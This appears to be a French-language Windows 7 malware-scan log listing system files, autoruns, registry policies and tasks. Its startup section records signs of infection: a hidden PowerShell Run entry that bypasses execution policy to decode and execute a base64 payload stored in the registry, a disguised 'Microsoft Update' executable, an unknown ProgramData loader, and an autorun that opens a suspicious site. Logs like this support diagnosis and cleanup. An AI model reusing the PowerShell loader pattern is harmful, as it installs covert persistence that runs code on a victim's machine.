[MD5.1F9335A2C68B65E7D95985FA50968EA0] - [21/01/2017 13:19:03] - (.© Microsoft Corporation. - Local Security Authority Process.) - [30 Ko] - (6.1.7601.23642) : C:\Windows\System32\lsass.exe
[MD5.5C627D1B1138676C0A7AB2C2C190D123] - [20/01/2017 21:34:32] - (.© Microsoft Corporation. - Distributed COM Services.) - [500 Ko] - (6.1.7601.17514) : C:\Windows\System32\rpcss.dll
[MD5.DD81D91FF3B0763C392422865C9AC12E] - [13/07/2009 23:57:20] - (.© Microsoft Corporation. Tous droits réservés. - Processus hôte Windows (Rundll32).) - [44.5 Ko] - (6.1.7600.16385) : C:\Windows\System32\rundll32.exe
[MD5.71C85477DF9347FE8E7BC55768473FCA] - [21/01/2017 13:28:33] - (.© Microsoft Corporation. Tous droits réservés. - Applications Services et Contrôleur.) - [321 Ko] - (6.1.7601.18829) : C:\Windows\System32\services.exe
[MD5.C78655BC80301D76ED4FEF1C1EA40A7D] - [13/07/2009 23:31:13] - (.© Microsoft Corporation. Tous droits réservés. - Processus hôte pour les services Windows.) - [26.5 Ko] - (6.1.7600.16385) : C:\Windows\System32\svchost.exe
[MD5.34BA256FBF83457F9D5E51A56DB54542] - [21/01/2017 13:19:10] - (.© Microsoft Corporation. Tous droits réservés. - DLL client de l’API uilisateur de Windows multi-utilisateurs.) - [985.5 Ko] - (6.1.7601.23594) : C:\Windows\System32\user32.dll
[MD5.BAFE84E637BF7388C96EF48D4D3FDD53] - [20/01/2017 21:33:40] - (.© Microsoft Corporation. Tous droits réservés. - Application d’ouverture de session Userinit.) - [30 Ko] - (6.1.7601.17514) : C:\Windows\System32\userinit.exe
[MD5.94355C28C1970635A31B3FE52EB7CEBA] - [13/07/2009 23:52:37] - (.© Microsoft Corporation. Tous droits réservés. - Application de démarrage de Windows.) - [126 Ko] - (6.1.7600.16385) : C:\Windows\System32\Wininit.exe
[MD5.8CEBD9D0A0A879CDE9F36F4383B7CAEA] - [21/01/2017 13:29:33] - (.© Microsoft Corporation. Tous droits réservés. - Application d’ouverture de session Windows.) - [444.5 Ko] - (6.1.7601.18540) : C:\Windows\System32\Winlogon.exe
[MD5.D31DC7A16DEA4A9BAF179F3D6FBDB38C] - [20/01/2017 21:34:35] - (.© Microsoft Corporation. Tous droits réservés. - Ancillary Function Driver for WinSock.) - [488 Ko] - (6.1.7601.17514) : C:\Windows\System32\Drivers\afd.sys
[MD5.02062C0B390B7729EDC9E69C680A6F3C] - [13/07/2009 23:19:47] - (.© Microsoft Corporation. - ATAPI IDE Miniport Driver.) - [23.56 Ko] - (6.1.7600.16385) : C:\Windows\System32\Drivers\atapi.sys
[MD5.A34FE1E025E88798E746F484956C0720] - [20/01/2017 21:33:41] - (.© Microsoft Corporation. - ATAPI Driver Extension.) - [151.88 Ko] - (6.1.7601.17514) : C:\Windows\System32\Drivers\ataport.sys
[MD5.B8BD2BB284668C84865658C77574381A] - [13/07/2009 23:19:47] - (.© Microsoft Corporation. - CD-ROM File System Driver.) - [90 Ko] - (6.1.7600.16385) : C:\Windows\System32\Drivers\cdfs.sys
[MD5.F036CE71586E93D94DAB220D7BDF4416] - [20/01/2017 21:32:50] - (.© Microsoft Corporation. - SCSI CD-ROM Driver.) - [144 Ko] - (6.1.7601.17514) : C:\Windows\System32\Drivers\cdrom.sys
[MD5.9B38580063D281A99E68EF5813022A5F] - [21/01/2017 13:19:08] - (.© Microsoft Corporation. - DFS Namespace Client Driver.) - [104 Ko] - (6.1.7601.23542) : C:\Windows\System32\Drivers\dfsc.sys
[MD5.97BFED39B6B79EB12CDDBFEED51F56BB] - [20/01/2017 21:32:50] - (.© Microsoft Corporation. - High Definition Audio Bus Driver.) - [119.5 Ko] - (6.1.7601.17514) : C:\Windows\System32\Drivers\hdaudbus.sys
[MD5.FA55C73D4AFFA7EE23AC4BE53B4592D3] - [13/07/2009 23:19:58] - (.© Microsoft Corporation. Tous droits réservés. - Pilote de port i8042.) - [103 Ko] - (6.1.7600.16385) : C:\Windows\System32\Drivers\i8042prt.sys
[MD5.AF9B39A7E7B6CAA203B3862582E9F2D0] - [14/07/2009 00:10:03] - (.© Microsoft Corporation. - IP Network Address Translator.) - [113.5 Ko] - (6.1.7600.16385) : C:\Windows\System32\Drivers\ipnat.sys
[MD5.632E8A00090E4F85F304E152C92C7F2C] - [21/01/2017 13:19:07] - (.© Microsoft Corporation. - Windows NT SMB Minirdr.) - [156 Ko] - (6.1.7601.23642) : C:\Windows\System32\Drivers\mrxsmb.sys
[MD5.79B47FD40D9A817E932F9D26FAC0A81C] - [20/01/2017 21:34:36] - (.© Microsoft Corporation. Tous droits réservés. - Pilote NDIS 6.20.) - [929.38 Ko] - (6.1.7601.17514) : C:\Windows\System32\Drivers\ndis.sys
[MD5.E47D571FEC2C76E867935109AB2A770C] - [21/01/2017 13:12:42] - (.© Microsoft Corporation. - MBT Transport driver.) - [256 Ko] - (6.1.7601.23451) : C:\Windows\System32\Drivers\netbt.sys
[MD5.05D78AA5CB5F3F5C31160BDB955D0B7C] - [20/01/2017 21:34:46] - (.© Microsoft Corporation. Tous droits réservés. - Pilote du système de fichiers NT.) - [1620.88 Ko] - (6.1.7601.17514) : C:\Windows\System32\Drivers\ntfs.sys
[MD5.0086431C29C35BE1DBC43F52CC273887] - [14/07/2009 00:00:41] - (.© Microsoft Corporation. Tous droits réservés. - Pilote de port parallèle.) - [95 Ko] - (6.1.7600.16385) : C:\Windows\System32\Drivers\parport.sys
[MD5.471815800AE33E6F1C32FB1B97C490CA] - [20/01/2017 21:34:07] - (.© Microsoft Corporation. - RAS L2TP mini-port/call-manager driver.) - [126.5 Ko] - (6.1.7601.17514) : C:\Windows\System32\Drivers\rasl2tp.sys
[MD5.1B6163C503398B23FF8B939C67747683] - [20/01/2017 21:33:32] - (.© Microsoft Corporation. - Microsoft RDP Device redirector.) - [162 Ko] - (6.1.7601.17514) : C:\Windows\System32\Drivers\rdpdr.sys
[MD5.548260A7B8654E024DC30BF8A7C5BAA4] - [14/07/2009 00:09:09] - (.© Microsoft Corporation. - SMB Transport driver.) - [91 Ko] - (6.1.7600.16385) : C:\Windows\System32\Drivers\smb.sys
[MD5.509383E505C973ED7534A06B3D19688D] - [20/01/2017 21:34:55] - (.© Microsoft Corporation. Tous droits réservés. - Pilote TCP/IP.) - [1879.38 Ko] - (6.1.7601.17514) : C:\Windows\System32\Drivers\tcpip.sys
[MD5.DDAD5A7AB24D8B65F8D724F5C20FD806] - [20/01/2017 21:34:30] - (.© Microsoft Corporation. - TDI Translation Driver.) - [116.5 Ko] - (6.1.7601.17514) : C:\Windows\System32\Drivers\tdx.sys
[MD5.0D08D2F3B3FF84E433346669B5E0F639] - [20/01/2017 21:34:16] - (.© Microsoft Corporation. Tous droits réservés. - Pilote de cliché instantané du volume.) - [288.88 Ko] - (6.1.7601.17514) : C:\Windows\System32\Drivers\volsnap.sys

---------- | Locked Applications


---------- | Explorer.exe component call (Microsoft Files Whitelisted)

(.http://tortoisesvn.net.-.Tortoise overlay handler shim.) - (1.1.4.26626) -- C:\Program Files\Common Files\TortoiseOverlays\TortoiseOverlays.dll
(.http://tortoisesvn.net.-.TortoiseSVN shell extension client.) - (1.9.5.27581) -- C:\Program Files\TortoiseSVN\bin\TortoiseStub.dll
(.http://tortoisesvn.net.-.TortoiseSVN shell extension client.) - (1.9.5.27581) -- C:\Program Files\TortoiseSVN\bin\TortoiseSVN.dll
(.Apache Software Foundation.-.Subversion library dll built for TortoiseSVN.) - (1.9.5.1210) -- C:\Program Files\TortoiseSVN\bin\libsvn_tsvn.dll
(.Apache Software Foundation.-.Apache Portable Runtime Library.) - (1.5.2.0) -- C:\Program Files\TortoiseSVN\bin\libapr_tsvn.dll
(.Apache Software Foundation.-.Apache Portable Runtime Utility Library.) - (1.5.4.0) -- C:\Program Files\TortoiseSVN\bin\libaprutil_tsvn.dll
(.Free Software Foundation.-.LGPLed libintl for Windows NT/2000/XP and Windows 95/98/ME.) - (0.14.6.0) -- C:\Program Files\TortoiseSVN\bin\intl3_tsvn.dll
(..-..) - (2.1.24.0) -- C:\Program Files\TortoiseSVN\bin\libsasl.dll
(.Idol Software.-.Crash handler library.) - (1.0.15.0) -- C:\Program Files\TortoiseSVN\bin\crshhndl.dll
(.AVAST Software.-.avast! Shell Extension.) - (7.0.1474.765) -- C:\Program Files\AVAST Software\Avast\ashShA64.dll
(.Alexander Roshal.-.WinRAR shell extension.) - (5.21.0.0) -- C:\Program Files (x86)\WinRAR\rarext64.dll
(.Igor Pavlov.-.7-Zip Shell Extension.) - (15.12.0.0) -- C:\Program Files\7-Zip\7-zip.dll
(.freearc.org.-.Context Menu Handler for FreeArc.) - (0.66.0.0) -- C:\Program Files (x86)\FreeArc\bin\ArcShellExt\ArcShellExt-64.dll
(..-..) - (0.0.0.0) -- :\windows\SysWOW64\cmdlineext_x64.dll

---------- | Svchost.exe component call (Microsoft Files Whitelisted)

(.Sonic Focus, Inc..-.SFFXSAPO.DLL.) - (1.0.0.42) -- C:\Windows\system32\SFSAPO64.dll
(..-..) - (0.0.0.0) -- C:\programdata\microsoft\windows\image\capcadf.tmp:ad

---------- | ZeroAccess Check

[HKLM\Software\Classes\CLSID\{1108BE51-F58A-4CDA-BB99-7A0227D11D5E}\InProcServer32] : %systemroot%\system32\wbem\fastprox.dll
[HKLM\Software\Classes\CLSID\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] : %SystemRoot%\system32\shell32.dll
[HKLM\Software\Classes\CLSID\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32] : %systemroot%\system32\wbem\fastprox.dll
[HKLM\Software\Classes\CLSID\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32] : %systemroot%\system32\wbem\wbemess.dll
[HKLM\Software\Classes\CLSID\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32] : %SystemRoot%\system32\shell32.dll
[HKLM\Software\WOW6432Node\Classes\CLSID\{1108BE51-F58A-4CDA-BB99-7A0227D11D5E}\InProcServer32] : %systemroot%\system32\wbem\fastprox.dll
[HKLM\Software\WOW6432Node\Classes\CLSID\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] : %SystemRoot%\system32\shell32.dll
[HKLM\Software\WOW6432Node\Classes\CLSID\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32] : %systemroot%\system32\wbem\fastprox.dll
[HKLM\Software\WOW6432Node\Classes\CLSID\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32] : %SystemRoot%\system32\shell32.dll

---------- | Startings up

Sidebar - (%ProgramFiles%\Windows Sidebar\Sidebar.exe /autoRun [HKU\S-1-5-19\SOFTWARE\...\Run]) - User: AUTORITE NT\SERVICE LOCAL
Sidebar - (%ProgramFiles%\Windows Sidebar\Sidebar.exe /autoRun [HKU\S-1-5-20\SOFTWARE\...\Run]) - User: AUTORITE NT\SERVICE RÉSEAU
DAEMON Tools Lite - ("C:\Program Files (x86)\DAEMON Tools Lite\DTLite.exe" -autorun [HKU\S-1-5-21-2557276657-2545994043-460956459-1000\SOFTWARE\...\Run]) - User: PC-PC\PC
Steam - ("C:\Program Files (x86)\Steam\steam.exe" -silent [HKU\S-1-5-21-2557276657-2545994043-460956459-1000\SOFTWARE\...\Run]) - User: PC-PC\PC
CCleaner Monitoring - ("C:\Program Files\CCleaner\CCleaner64.exe" /MONITOR [HKU\S-1-5-21-2557276657-2545994043-460956459-1000\SOFTWARE\...\Run]) - User: PC-PC\PC
GUDelayStartup - ("C:\Program Files (x86)\Glary Utilities 5\StartupManager.exe" -delayrun [HKU\S-1-5-21-2557276657-2545994043-460956459-1000\SOFTWARE\...\Run]) - User: PC-PC\PC
Microsoft Update - (C:\Users\PC\AppData\Local\Microsoft Windows\taskhost.exe [HKU\S-1-5-21-2557276657-2545994043-460956459-1000\SOFTWARE\...\Run]) - User: PC-PC\PC
Skype - ("C:\Program Files (x86)\Skype\Phone\Skype.exe" /minimized /regrun [HKU\S-1-5-21-2557276657-2545994043-460956459-1000\SOFTWARE\...\Run]) - User: PC-PC\PC
uTorrent - ("C:\Users\PC\AppData\Roaming\uTorrent\uTorrent.exe"  /MINIMIZED [HKU\S-1-5-21-2557276657-2545994043-460956459-1000\SOFTWARE\...\Run]) - User: PC-PC\PC
TortoiseSVN Monitor - (C:\Program Files\TortoiseSVN\bin\TortoiseProc.exe /tray [HKU\S-1-5-21-2557276657-2545994043-460956459-1000\SOFTWARE\...\Run]) - User: PC-PC\PC
Gaijin.Net Agent - ("C:\Users\PC\AppData\Local\Gaijin\Program Files (x86)\NetAgent\gjagent.exe" [HKU\S-1-5-21-2557276657-2545994043-460956459-1000\SOFTWARE\...\Run]) - User: PC-PC\PC
{0CC6F6C7-FAD6-40D4-82DD-F9DF16D5B591} - (C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\CLTQFLAWUM').PXdyiSjlCDS))); [HKU\S-1-5-21-2557276657-2545994043-460956459-1000\SOFTWARE\...\Run]) - User: PC-PC\PC
PC - (explorer.exe http://kb-ribaki.org [HKU\S-1-5-21-2557276657-2545994043-460956459-1000\SOFTWARE\...\Run]) - User: PC-PC\PC
Load[0] - (C:\ProgramData\msiqjkfyu.exe [*HKU\S-1-5-21-2557276657-2545994043-460956459-1000\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\Windows]) - User: PC-PC\PC
StartCN - ("C:\Program Files\AMD\CNext\CNext\cnext.exe" atlogon [HKLM\SOFTWARE\...\Run]) - User: Public
Malwarebytes TrayApp - (C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\mbamtray.exe [HKLM\SOFTWARE\...\Run]) - User: Public
Load[0] - (C:\ProgramData\msiqjkfyu.exe [win.ini]) - User: Public

[HKU\S-1-5-21-2557276657-2545994043-460956459-1000\Software\Microsoft\Command Processor]
"CompletionChar"=9   
"DefaultColor"=0   
"EnableExtensions"=1   
"PathCompletionChar"=9   

[HKU\S-1-5-21-2557276657-2545994043-460956459-1000\Software\Microsoft\Windows\CurrentVersion\Run]
"DAEMON Tools Lite"="C:\Program Files (x86)\DAEMON Tools Lite\DTLite.exe" -autorun   
"Steam"="C:\Program Files (x86)\Steam\steam.exe" -silent   
"CCleaner Monitoring"="C:\Program Files\CCleaner\CCleaner64.exe" /MONITOR   
"GUDelayStartup"="C:\Program Files (x86)\Glary Utilities 5\StartupManager.exe" -delayrun   
"Microsoft Update"=C:\Users\PC\AppData\Local\Microsoft Windows\taskhost.exe   [07/04/2016 22:00:42]
"Skype"="C:\Program Files (x86)\Skype\Phone\Skype.exe" /minimized /regrun   
"uTorrent"="C:\Users\PC\AppData\Roaming\uTorrent\uTorrent.exe"  /MINIMIZED   
"TortoiseSVN Monitor"=C:\Program Files\TortoiseSVN\bin\TortoiseProc.exe /tray   
"Gaijin.Net Agent"="C:\Users\PC\AppData\Local\Gaijin\Program Files (x86)\NetAgent\gjagent.exe"   
"{0CC6F6C7-FAD6-40D4-82DD-F9DF16D5B591}"=C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\CLTQFLAWUM').PXdyiSjlCDS)));   
"PC"=explorer.exe http://kb-ribaki.org   

[HKU\S-1-5-21-2557276657-2545994043-460956459-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RunMRU]
"a"=dxdiag\1   
"MRUList"=hagfedbc   
"b"=recent\1   
"d"=ipconfig\1   
"e"=cmd\1   
"f"=regedit\1   
"g"=ncpa.cpl\1   
"h"=systeminfo\1   

[HKU\S-1-5-21-2557276657-2545994043-460956459-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows]
"Device"=Microsoft XPS Document Writer,winspool,Ne00:   
"UserSelectedDefault"=0   
"Load"=C:\ProgramData\msiqjkfyu.exe   [21/01/2017 13:19:04]

[HKLM\Software\Microsoft\Command Processor]
"CompletionChar"=64   
"DefaultColor"=0   
"EnableExtensions"=1   
"PathCompletionChar"=64   

[HKLM\Software\Microsoft\Windows\CurrentVersion\Run]
"StartCN"="C:\Program Files\AMD\CNext\CNext\cnext.exe" atlogon   
"Malwarebytes TrayApp"=C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\mbamtray.exe   [27/06/2017 12:08:26]

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows]
"IconServiceLib"=IconCodecService.dll   
"DdeSendTimeout"=0   
"DesktopHeapLogging"=1   
"GDIProcessHandleQuota"=10000   
"ShutdownWarningDialogTimeout"=4294967295   
"USERNestedWindowLimit"=50   
"USERPostMessageLimit"=10000   
"USERProcessHandleQuota"=10000   
""=mnmsrvc   
"DeviceNotSelectedTimeout"=15   
"Spooler"=yes   
"TransmissionRetryTimeout"=90   
"AppInit_DLLs"=   
"LoadAppInit_DLLs"=0   

[HKLM\Software\WOW6432Node\Microsoft\Command Processor]
"CompletionChar"=64   
"DefaultColor"=0   
"EnableExtensions"=1   
"PathCompletionChar"=64   

[HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run]
"avast"="C:\Program Files\AVAST Software\Avast\avastUI.exe" /nogui   

[HKLM\Software\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Windows]
"IconServiceLib"=IconCodecService.dll   
"DdeSendTimeout"=0   
"DesktopHeapLogging"=1   
"GDIProcessHandleQuota"=10000   
"ShutdownWarningDialogTimeout"=4294967295   
"USERNestedWindowLimit"=50   
"USERPostMessageLimit"=10000   
"USERProcessHandleQuota"=10000   
""=mnmsrvc   
"DeviceNotSelectedTimeout"=15   
"Spooler"=yes   
"TransmissionRetryTimeout"=90   
"AppInit_DLLs"=   
"LoadAppInit_DLLs"=0   

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad]
"WebCheck"={E6FB5E20-DE35-11CF-9C87-00AA005127ED}   


---------- | Win.ini : 



---------- | System.ini : 



---------- | Tasks List

Adobe Acrobat Update Task
Adobe Flash Player Updater
AMD Updater
CCleanerSkipUAC
GoogleUpdateTaskMachineCore
GoogleUpdateTaskMachineUA
RealUpgradeLogonTaskS-1-5-21-2557276657-2545994043-460956459-1000
RealUpgradeScheduledTaskS-1-5-21-2557276657-2545994043-460956459-1000
{69D1ADEB-1CE8-4F4E-A7E6-E4395D1587CB}
{97DBCC3A-3FD3-4BEA-8419-96B335788151}
{99EF7424-3012-4A0D-B554-2DAB4DFDC05B}
{C94C0197-D567-4783-8178-097AF3D224F4}
{CB1DF63E-DA0E-40C7-8F23-63311EA6CE99}
{CEAB3CB1-7742-4DFA-8739-44966BA19B77}

---------- | Startings up registry ¦ Folder

[HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\Adobe ARM] : "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"  
[HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\Adobe Reader Speed Launcher] : "C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Reader_sl.exe"  
[HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\SoundMAXPnP] : C:\Program Files (x86)\Analog Devices\Core\smax4pnp.exe  [07/11/2014 11:29:05]
[HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\TkBellExe] : "C:\Program Files (x86)\Real\RealPlayer\Update\realsched.exe" -osboot  

---------- | Other keys


[HKLM\System\CurrentControlSet\Control\SecurityProviders]
"SecurityProviders"=credssp.dll   

[HKLM\System\CurrentControlSet\Control\Terminal Server]
"RCDependentServices"=CertPropSvc
SessionEnv   
"NotificationTimeOut"=0   
"SnapshotMonitors"=1   
"ProductVersion"=5.1   
"AllowRemoteRPC"=0   
"DelayConMgrTimeout"=0   
"fDenyTSConnections"=1   
"StartRCM"=0   
"TSAdvertise"=0   
"DeleteTempDirsOnExit"=1   
"fSingleSessionPerUser"=1   
"PerSessionTempDir"=0   
"TSUserEnabled"=0   
"InstanceID"=873210e7-4717-4bb2-ad45-7e704b9   
"fCredentialLessLogonSupported"=1   
"fCredentialLessLogonSupportedTSS"=1   
"fCredentialLessLogonSupportedKMRDP"=1   

[HKLM\System\CurrentControlSet\Control\Session Manager]
"CriticalSectionTimeout"=2592000   
"GlobalFlag"=0   
"HeapDeCommitFreeBlockThreshold"=0   
"HeapDeCommitTotalFreeThreshold"=0   
"HeapSegmentCommit"=0   
"HeapSegmentReserve"=0   
"ProcessorControl"=2   
"ResourceTimeoutCount"=648000   
"BootExecute"=autocheck autochk *    
"ExcludeFromKnownDlls"=   
"ObjectDirectories"=\Windows
\RPC Control   
"ProtectionMode"=1   
"NumberOfInitialSessions"=2   

[HKLM\System\CurrentControlSet\Control]
"PreshutdownOrder"=wuauserv
gpsvc
trustedinstaller   
"WaitToKillServiceTimeout"=200   
"CurrentUser"=USERNAME   
"BootDriverFlags"=0   
"ServiceControlManagerExtension"=%systemroot%\system32\scext.dll   
"SystemStartOptions"= NOEXECUTE=OPTIN   
"SystemBootDevice"=multi(0)disk(0)rdisk(0)partition(2)   
"FirmwareBootDevice"=multi(0)disk(0)rdisk(0)partition(1)   

[HKLM\System\CurrentControlSet\Control\lsa]
"auditbaseobjects"=0   
"auditbasedirectories"=0   
"crashonauditfail"=0   
"fullprivilegeauditing"=0x00   
"Bounds"=0x0030000000200000   
"LimitBlankPasswordUse"=1   
"NoLmHash"=1   
"Notification Packages"=scecli   
"Security Packages"=kerberos
msv1_0
schannel
wdigest
tspkg
pku2u   
"Authentication Packages"=msv1_0   
"LsaPid"=652   
"SecureBoot"=1   
"ProductType"=6   
"disabledomaincreds"=0   
"everyoneincludesanonymous"=0   
"forceguest"=0   
"restrictanonymous"=0   
"restrictanonymoussam"=1   


---------- | .LNK with Arguments

C:\Google Chrome.lnk        () s%\Monold\Monold\chrome.exe
c:\users\pc\desktop\adsfix_donate.lnk - Encrypted: False - Target: C:\Program Files (x86)\Internet Explorer\iexplore.exe - Args: (hxxps://www.paypal.com/cgi-bin/webscr?cmd=_s-xclick&hosted_button_id=S3AQ8V3XRWWYN) - Hidden: False - Status: OK

---------- | AppCertDlls


---------- | Dnsapi.dll

C:\Windows\System32\dnsapi.dll -> OK : \drivers\etc\hosts
C:\Windows\SysWOW64\dnsapi.dll -> OK : \drivers\etc\hosts

---------- | Policies | Registry

[HKU\S-1-5-21-2557276657-2545994043-460956459-1000\Control Panel\Desktop]
"ScreenSaveActive"=1   
"ActiveWndTrackTimeout"=0   
"BlockSendInputResets"=0   
"CaretWidth"=1   
"ClickLockTime"=1200   
"CoolSwitchColumns"=7   
"CoolSwitchRows"=3   
"CursorBlinkRate"=530   
"DockMoving"=1   
"DragFromMaximize"=1   
"DragFullWindows"=1   
"DragHeight"=4   
"DragWidth"=4   
"FocusBorderHeight"=1   
"FocusBorderWidth"=1   
"FontSmoothing"=2   
"FontSmoothingGamma"=0   
"FontSmoothingOrientation"=1   
"FontSmoothingType"=2   
"ForegroundFlashCount"=7   
"ForegroundLockTimeout"=200000   
"LeftOverlapChars"=3   
"MenuShowDelay"=400   
"PaintDesktopVersion"=0   
"RightOverlapChars"=3   
"SnapSizing"=1   
"TileWallpaper"=0   
"WallpaperOriginX"=0   
"WallpaperOriginY"=0   
"WallpaperStyle"=10   
"WheelScrollChars"=3   
"WheelScrollLines"=3   
"WindowArrangementActive"=1   
"UserPreferencesMask"=0x9E3E078012000000   
"Wallpaper"=C:\Users\PC\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg   [07/11/2014 11:07:05]
"Pattern Upgrade"=TRUE   
"ScreenSaveTimeOut"=300   
"ScreenSaverIsSecure"=0   
"SCRNSAVE.EXE"=C:\Windows\system32\scrnsave.scr   [13/07/2009 23:56:35]
"WaitToKillAppTimeout"=200   

[HKU\S-1-5-21-2557276657-2545994043-460956459-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoDriveTypeAutoRun"=145   

[HKU\S-1-5-21-2557276657-2545994043-460956459-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel]
"{59031a47-3f72-44a7-89c5-5595fe6b30ee}"=0   
"{20D04FE0-3AEA-1069-A2D8-08002B30309D}"=0   
"{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}"=0   

[HKU\S-1-5-21-2557276657-2545994043-460956459-1000\Software\Microsoft\Windows\CurrentVersion\Explorer]
"ExplorerStartupTraceRecorded"=1   
"ShellState"=0x240000003028000000000000000000000000000001000000120000000000000022000000   
"CleanShutdown"=0   
"Browse For Folder Width"=363   
"Browse For Folder Height"=338   
"link"=0x1E000000   
"EnableAutoTray"=1   

[HKU\S-1-5-21-2557276657-2545994043-460956459-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"Start_SearchFiles"=2   
"ServerAdminUI"=0   
"Hidden"=2   
"ShowCompColor"=1   
"HideFileExt"=1   
"DontPrettyPath"=0   
"ShowInfoTip"=1   
"HideIcons"=0   
"MapNetDrvBtn"=0   
"WebView"=1   
"Filter"=0   
"SuperHidden"=0   
"SeparateProcess"=0   
"AutoCheckSelect"=0   
"IconsOnly"=0   
"ShowTypeOverlay"=1   
"ListviewAlphaSelect"=1   
"ListviewShadow"=1   
"TaskbarAnimations"=1   
"StartMenuInit"=4   
"Start_ShowMyGames"=0   
"NavPaneShowAllFolders"=1   
"ShowSuperHidden"=0   
"DisablePreviewDesktop"=1   

[HKU\S-1-5-21-2557276657-2545994043-460956459-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\WordWheelQuery]
"MRUListEx"=0x49000000480000004700000046000000440000004500000043000000380000003B0000004200000041000000400000003F0000003E0000003D0000003C0000003A0000003900000037000000330000003400000036000000350000003200000031000000300000002F0000002E0000002D0000002C0000000D0000002B0000002A000000240000002900000028000000270000002600000025000000230000002200000021000000200000001F0000001E0000001D0000001C0000001B000000020000001A000000190000001800000017000000160000001500000014000000130000001200000011000000100000000F0000000E0000000C0000000B0000000A000000090000000800000007000000060000000100000005000000040000000300000000000000FFFFFFFF   
"0"=0x75006200690073006F00660074000000   
"3"=0x73006100750076006500670061007200640065000000   
"4"=0x630061006C00630075006C006D006100740072006900630065000000   
"5"=0x73006F00750064006100690073000000   
"1"=0x72006500630065006E0074000000   
"6"=0x6700740061000000   
"7"=0x730061006E00200061006E00640072006500610073000000   
"8"=0x730063007200650065006E0073000000   
"9"=0x730063007200650065006E000000   
"10"=0x76006900630074006F007200690061000000   
"11"=0x73006B007900700065000000   
"12"=0x620069000000   
"14"=0x6600690067007500720065000000   
"15"=0x63006B000000   
"16"=0x63006B00690069000000   
"17"=0x6C0069006E006700750061000000   
"18"=0x6400610065006D006F006E000000   
"19"=0x73006300E8006E0065000000   
"20"=0x6100730069000000   
"21"=0x62006F006400790067000000   
"22"=0x700061007400630068000000   
"23"=0x6C0061006E00670075006100670065000000   
"24"=0x65006E002D00750073000000   
"25"=0x73006300720069007000740073000000   
"26"=0x7300630072006900700074000000   
"2"=0x73006100760065000000   
"27"=0x70006C007500670069006E0073000000   
"28"=0x77006500610070006F006E000000   
"29"=0x78006D006C000000   
"30"=0x650071007500690070000000   
"31"=0x63006F006E0063006C006100760065000000   
"32"=0x68006900730074006F00720079000000   
"33"=0x69006E0074006500720066006100630065000000   
"34"=0x740075006E006E0067006C0065000000   
"35"=0x670061006D006500720061006E006700650072000000   
"37"=0x760069007300750061006C000000   
"38"=0x750073006500720073006100760065000000   
"39"=0x6E006100740069006F006E0061006C000000   
"40"=0x73006D000000   
"41"=0x670065006F0070006F006C00690074006900630061006C000000   
"36"=0x7400650061006D0073007000650061006B000000   
"42"=0x7400720075006D0070000000   
"43"=0x70006F0077006500720020007200650076006F006C007500740069006F006E000000   
"13"=0x64006F006600750073000000   
"44"=0x740072006F007000690063006F000000   
"45"=0x7700610079000000   
"46"=0x6C00650067006100630079000000   
"47"=0x64006F0077006E006C006F006100640020006D0061006E0061006700650072000000   
"48"=0x640073006D000000   
"49"=0x660064006D000000   
"50"=0x6600720065006500200064006F0077006E006C006F00610064000000   
"53"=0x6500750072006F000000   
"54"=0x64006900730063006F007500720073000000   
"52"=0x70006100630069006600690063000000   
"51"=0x62006100740074006C006500730074006100740069006F006E000000   
"55"=0x7400680075006E006400650072000000   
"57"=0x6200610063006B00750070000000   
"58"=0x770069006E0064006F00770073002E006F006C0064000000   
"60"=0x6E00610070006F006C0065006F006E000000   
"61"=0x74006F00740061006C0020007700610072000000   
"62"=0x740068006500200063007200650061007400690076006500200061007300730065006D0062006C0079000000   
"63"=0x75007200620061006E00200065006D0070006900720065000000   
"64"=0x700068006F0074006F002000660069006C007400720065000000   
"65"=0x700068006F0074006F000000   
"66"=0x69006E007400650072006E00650074000000   
"59"=0x7400610077006A00690068000000   
"56"=0x77006100720020007400680075006E006400650072000000   
"67"=0x700068006F0074006F00660069006C007400720065000000   
"69"=0x6800690070000000   
"68"=0x640061006C0069006C000000   
"70"=0x6300720075007300610064006500720020006B0069006E00670073000000   
"71"=0x670061006D0065000000   
"72"=0x610067006F0074000000   
"73"=0x7A00680070000000   

[HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"ConsentPromptBehaviorAdmin"=5   
"ConsentPromptBehaviorUser"=3   
"EnableInstallerDetection"=1   
"EnableLUA"=1   
"EnableSecureUIAPaths"=1   
